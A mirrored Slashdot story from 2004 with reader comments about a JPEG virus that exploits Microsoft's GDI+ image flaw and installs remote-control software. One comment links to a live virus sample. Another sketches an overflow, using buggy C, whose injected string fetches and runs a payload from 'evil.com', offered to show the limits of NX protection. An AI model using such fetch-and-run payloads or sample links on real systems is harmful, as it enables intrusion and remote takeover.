Slashdot Mirror

← Back to Stories (view on slashdot.org)

First JPEG Virus Posted To Usenet

Posted by timothy on from the one-neck-to-wring dept.

Shawn writes "This could possibly be the worst viruses yet! Earlier this month Microsoft announced a problem in their GDI driver that processes the way JPEG images are displayed. Someone has finally posted an exploit to Usenet. Easynews, a premium Usenet provider, found the virus Sunday afternoon. Up-to-date information about how we found it and what it does is located at www.easynews.com/virus.txt. When this picture is viewed it installs remote management software (winvnc and radmin) and will connect to irc."

14 of 694 comments (clear)

  1. Re:Anyone have a working copy? by JS_RIDDLER · · Score: 5, Informative

    In the article the virus.txt has a jpeg sample in code.

    --
    _JS
  2. Re:Anyone have a working copy? by Anonymous Coward · · Score: 5, Informative

    http://easynews.com/test/possiblevirus.jpg.gz

    Got the link from bugtraq a few hours ago.

  3. Re:Anyone have a working copy? by Anonymous+Freak · · Score: 5, Informative

    Well, Apple's Preview (as of 10.3.5 with all the latest updates as of 6:00 PM PDT, 9/27/04,) says it's not a supported file type.

    Graphic Converter complains that "Some parts of the file may be missing."

    Safari displays a blank page, with no errors.

    In all cases, I can't find any file-system goofiness. (And the free-with-DotMac Virex doesn't detect it as a virus.)

    (The offending "virus" is available as a linked-to zip file in the linked virus.txt page.)

    --
    Another non-functioning site was "uncertainty.microsoft.com."
    The purpose of that site was not known.
  4. Re:Can be prevented... by Zocalo · · Score: 5, Informative

    Yes it has. Unfortunately like many Microsoft patches it gives you a nice fuzzy sense of false security. According to Microsoft, I'm nice and safe, but according to Tom Liston's GDIScanner and a quick perusal of the file versions, I'm quite possibly not. Fortunately my virusscanner *does* seem to pick up on this, but that's no thanks to Microsoft.

    --
    UNIX? They're not even circumcised! Savages!
  5. The answer is... by Leomania · · Score: 5, Informative

    yes, if you haven't updated to the latest version.

    See this Slashdot thread.

    - Leo

    --
    You don't use science to show that you're right, you use science to become right.
  6. Re:That's pretty amazing. by mini+me · · Score: 5, Informative

    Hopefully mozilla decodes the jpgs itself before rendering them on windows.

    It does. But Mozilla had almost the exact same problem with both BMP and PNG in the last week or two. So it's not just Microsoft who has vulnerable image decoders.

  7. Re:That's pretty amazing. by datawar · · Score: 5, Informative

    Are you serious? Of course Slashdot covered those stories too.

    Critical Mozilla, Thunderbird Vulnerabilities

    CERT Warns Of Multiple Vulnerabilities In Libpng

  8. Re:Just begging to be sued by toetagger1 · · Score: 5, Informative

    Google finds a whole lot of exploids for this guy. Ranging from apache to AIM away message buffer over runs.

    --
    who | grep -i blond | date cd ~; unzip; touch; strip; finger; mount; gasp; yes; uptime; umount; sleep
  9. Microsoft Patch by bcreane · · Score: 5, Informative

    FYI, here's the fix from M$ for this exploit: Security Bulletin

  10. Re:Can be prevented... by Saratoga+C++ · · Score: 5, Informative

    Sorry to burst your bubble dude, but that patch only fixed the system's instance of GDI+ There are a ton of apps that have their own version of GDI+ built on their own app path. just because you use the patch that doesn't mean that its actually fixed.

    Say your using app X that uses GDI+ to render its own image stuff (say its a picture album maker). It keeps its own version of GDI+ that the developers extended for their own reasons. This GDI+ is vonerable. After patching this older version of GDI+ is still on your system so that app is vonerable...

    So buyer beware.

  11. Re:I don't see why this is a problem by Waffle+Iron · · Score: 5, Informative
    If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

    It can still do anything the user can do, including installing itself in the user's account space, setting itself to run every time the user logs on, uploading all of the files the user can access, logging the user's keystrokes, sending email, pinging for other systems, etc. Running as a non-administrator is not a panacea.

  12. Re:NX Protection? by Anonymous Coward · · Score: 5, Informative
    I can't speak for this virus specifically, but DEP isn't the end-all-be-all of buffer overflow prevention. For example:
    char overflowed[10];
    char command="echo \"some silly command\"";

    int main(){
    strcpy(argv[1], overflowed);
    exec(command);
    }
    We can overflow overflowed to change command into something like "sh \"wget http:\\evil.com\virus > virus.sh;virus.sh\"" or somesuch. Bonus points if you diddle with the C library's jump table so that any system call ends up being exec(..). The key here is that no data segments are executed, so NX protection wouldn't help.
  13. Re:Can be prevented... by Anonymous Coward · · Score: 5, Informative

    while we're bursting bubbles, the patch from microsoft contains a tool that scans your hard disk for all vulnerable gdi dlls.

    Another bubble bites the dust! It detects, but does not fix the problem. Nor does it even tell you where the problem is. This was covered earlier today.

  14. Re:That's pretty amazing. by IchBinEinPenguin · · Score: 5, Informative

    Returning with the same stuff they have now, but with little or no security issues

    Sorry, that won't work.

    Some of the stuff is insecure by design!. Not "designed to be insecure", just "impossible to secure given the design".

    Take ActiveX: running binary code downloaded from a anywhere without a JVM-like sandbox is insecure. Not matter how many digital signatures, OK dialog boxes and warnig messages you add, some (most?) users WILL simply click through all the warnings and have their boxes 0wn3d.

    Design has tradeoffs between security, performance, usability etc. etc. Some of this stuff you can't fix without changing the basic design (i.e. starting from scratch)